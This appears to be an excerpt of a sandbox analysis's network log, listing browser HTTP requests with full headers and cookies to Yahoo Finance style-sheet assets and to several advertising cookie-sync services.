Source: global trafficHTTP traffic detected: GET /ups/58292/sync?_origin=1&uid=176682A8-E121-44A7-818D-4FE53D542BB2&redir=true&gdpr=0&gdpr_consent= HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; IDSYNC="19ac~2kzt:19aj~2kzt:19bn~2kzt:19bu~2kzt:19cu~2kzt:19cw~2kzt:19e0~2kzt:19ea~2kzt"
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/SkeletonLoader.YZvit63q.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTI4NDkmdGw9MTI5NjAw&piggybackCookie=07c89b85-4c1c-424d-8df0-0123ed6cebb6&gdpr=0&gdpr_consent= HTTP/1.1Host: simage2.pubmatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: KADUSERCOOKIE=176682A8-E121-44A7-818D-4FE53D542BB2; KTPCACOOKIE=YES; chkChromeAb67Sec=2; DPSync4=1728864000%3A227_226_219_197_245_241; SyncRTB4=1728259200%3A223%7C1728864000%3A220_201_13_251_54_71_3_21_56_266; ipc=160648^https%3A%2F%2Fimage4.pubmatic.com%2FAdServer%2FSPug%3Fp%3D160648%26pmc%3DPM_PMC%26pr%3Dhttps%253A%252F%252Fsync-pm.ads.yieldmo.com%252Fsync%253Fpn_id%253Dpub%2526id%253D%2523PMUID%2526gdpr%253DPM_GDPR%2526gdpr_consent%253DPM_CONSENT^2^0; pi=160648:3; KRTBCOOKIE_57=22776-7992184014990425658&KRTB&23339-7992184014990425658; PugT=1727716887
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=gumgum_dbm&google_hm=ZV81YTg2N2M3OC1kOTBkLTRkZjgtYjhmZi1lMDQxZDBkYzJlMjI=&gdpr=0&gdpr_consent=&google_redir=https%3A%2F%2Fusersync.gumgum.com%2Fusersync%3Fb%3Dgdv HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://rtb.gumgum.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=gumgum&ttd_tpi=1&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://rtb.gumgum.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TDID=07c89b85-4c1c-424d-8df0-0123ed6cebb6; TDCPM=CAESFgoHc3Z4OXQ1MBILCOb3lfnK37A9EAUSFwoIcHVibWF0aWMSCwiykPGYy9-wPRAFGAEgASgCMgsI3Ib0xeHfsD0QBTgBWghwdWJtYXRpY2AC
Source: global trafficHTTP traffic detected: GET /AdServer/ImgSync?sec=1&gdpr=0&gdpr_consent=&us_privacy=${US_PRIVACY} HTTP/1.1Host: image8.pubmatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: KADUSERCOOKIE=176682A8-E121-44A7-818D-4FE53D542BB2; chkChromeAb67Sec=2; DPSync4=1728864000%3A227_226_219_197_245_241; SyncRTB4=1728259200%3A223%7C1728864000%3A220_201_13_251_54_71_3_21_56_266; ipc=160648^https%3A%2F%2Fimage4.pubmatic.com%2FAdServer%2FSPug%3Fp%3D160648%26pmc%3DPM_PMC%26pr%3Dhttps%253A%252F%252Fsync-pm.ads.yieldmo.com%252Fsync%253Fpn_id%253Dpub%2526id%253D%2523PMUID%2526gdpr%253DPM_GDPR%2526gdpr_consent%253DPM_CONSENT^2^0; pi=160648:3; KRTBCOOKIE_57=22776-7992184014990425658&KRTB&23339-7992184014990425658; PugT=1727716887
Source: global trafficHTTP traffic detected: GET /getuid?https://usersync.gumgum.com/usersync?b=apn&i=$UID HTTP/1.1Host: secure.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rtb.gumgum.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XANDR_PANID=RGs3E-BNKWUM9-E0Yk6nUq1ov1cuPZyw51dkSNWtWVZE2TtKD2t0w8nihOlT-IcCBZ6eN6XF0B7WUcdB-B2J9u_noxx1687OtyCpmDgTn8Y.; receive-cookie-deprecation=1; uuid2=7992184014990425658
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/SectionHeader.B9ETuNQk.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/SectorListings.C2wY7ASd.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /setuid?bidder=conversant&uid=AQAJ-JBLklcgHwJ-ptiSAQEBAQEBAQCTQvKIRgEBAJNC8ohG&expiration=1727803286&gpp_sid=-1&gpp=DBAA&is_secure=true&gdpr_consent=&gdpr=0 HTTP/1.1Host: pbs.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; uids=eyJ0ZW1wVUlEcyI6eyJpeCI6eyJ1aWQiOiJadnJlRU5ITTZJNEFBQXlxQURvMmt3QUFBX0lBQUFJQiIsImV4cGlyZXMiOiIyMDI0LTEwLTE0VDE3OjIxOjIyLjQxMDIyNTg2NFoifSwidHRkIjp7InVpZCI6IjA3Yzg5Yjg1LTRjMWMtNDI0ZC04ZGYwLTAxMjNlZDZjZWJiNiIsImV4cGlyZXMiOiIyMDI0LTEwLTE0VDE3OjIxOjI2Ljg4OTIwNTA0M1oifX19
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/loadIndustry.Bf7GWgL8.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /sync?ssp=xapads&user_id=A2240589183930881574&us_privacy=1YNN HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cm-notify?pi=gumgum HTTP/1.1Host: creativecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://rtb.gumgum.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sync?nid=20&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid= HTTP/1.1Host: sync.srv.stackadapt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sa-user-id=s%3A0-44ef61b2-fe37-563b-497a-08aac775d996.HUZAD87nGmfB6ts9monpnGc74iU%2BnIDtZVp3vzenSYI; sa-user-id=s%3A0-44ef61b2-fe37-563b-497a-08aac775d996.HUZAD87nGmfB6ts9monpnGc74iU%2BnIDtZVp3vzenSYI; sa-user-id-v2=s%3ARO9hsv43VjtJegiqx3XZlggueyE.f1DEnV0kSRDqXApJa8DQm75QGQfLI69IqPby0eTbqqo; sa-user-id-v2=s%3ARO9hsv43VjtJegiqx3XZlggueyE.f1DEnV0kSRDqXApJa8DQm75QGQfLI69IqPby0eTbqqo; sa-user-id-v3=s%3AAQAKIPMD_qM83gEw_KpANQ1k_u5OM7M1EA1HSai3RTqI7aomEHwYBCCVvOu3BjABOgT87-jmQgR-pEY0.vN32%2Fd4YZ9DOY3AsHv3gov3556bSU87K4Y1v5IEQfZQ; sa-user-id-v3=s%3AAQAKIPMD_qM83gEw_KpANQ1k_u5OM7M1EA1HSai3RTqI7aomEHwYBCCVvOu3BjABOgT87-jmQgR-pEY0.vN32%2Fd4YZ9DOY3AsHv3gov3556bSU87K4Y1v5IEQfZQ
Source: global trafficHTTP traffic detected: GET /aux/idsync?proto=gumgum HTTP/1.1Host: tg.socdm.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://rtb.gumgum.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cm-notify?pi=pubmatic&gdpr=-1&gdpr_consent=&tc=1 HTTP/1.1Host: creativecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: g=WMYgf9Wm2L4xQIxLufYh_1727716888099; ts=1727716888
Source: global trafficHTTP traffic detected: GET /sync?nid=114&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid= HTTP/1.1Host: sync.srv.stackadapt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sa-user-id=s%3A0-44ef61b2-fe37-563b-497a-08aac775d996.HUZAD87nGmfB6ts9monpnGc74iU%2BnIDtZVp3vzenSYI; sa-user-id=s%3A0-44ef61b2-fe37-563b-497a-08aac775d996.HUZAD87nGmfB6ts9monpnGc74iU%2BnIDtZVp3vzenSYI; sa-user-id-v2=s%3ARO9hsv43VjtJegiqx3XZlggueyE.f1DEnV0kSRDqXApJa8DQm75QGQfLI69IqPby0eTbqqo; sa-user-id-v2=s%3ARO9hsv43VjtJegiqx3XZlggueyE.f1DEnV0kSRDqXApJa8DQm75QGQfLI69IqPby0eTbqqo; sa-user-id-v3=s%3AAQAKIPMD_qM83gEw_KpANQ1k_u5OM7M1EA1HSai3RTqI7aomEHwYBCCVvOu3BjABOgT87-jmQgR-pEY0.vN32%2Fd4YZ9DOY3AsHv3gov3556bSU87K4Y1v5IEQfZQ; sa-user-id-v3=s%3AAQAKIPMD_qM83gEw_KpANQ1k_u5OM7M1EA1HSai3RTqI7aomEHwYBCCVvOu3BjABOgT87-jmQgR-pEY0.vN32%2Fd4YZ9DOY3AsHv3gov3556bSU87K4Y1v5IEQfZQ
Source: global trafficHTTP traffic detected: GET /w/1.0/sd?id=537072971&val=07c89b85-4c1c-424d-8df0-0123ed6cebb6&ttd_puid=89da3b4d-4019-3a17-5e17-79a012d51d47&gdpr=0&gdpr_consent= HTTP/1.1Host: us-u.openx.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=5a760414-e99e-05e0-04c1-b14876f22eba|1727716879; pd=v2|1727716881|vMgavPkWgyiK; univ_id=537072971|07c89b85-4c1c-424d-8df0-0123ed6cebb6|1727716886210126
Source: global trafficHTTP traffic detected: GET /xuid?mid=2662&xuid=y-B5gCAc9E2oTPbKbUs8YZwFQXu8mxBgMirWK046Y6SQ--~A&dongle=0883 HTTP/1.1Host: eb2.3lift.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluid=3811239664715375770435; tluidp=3811239664715375770435
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/GradientScale.BwfNrsj8.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; 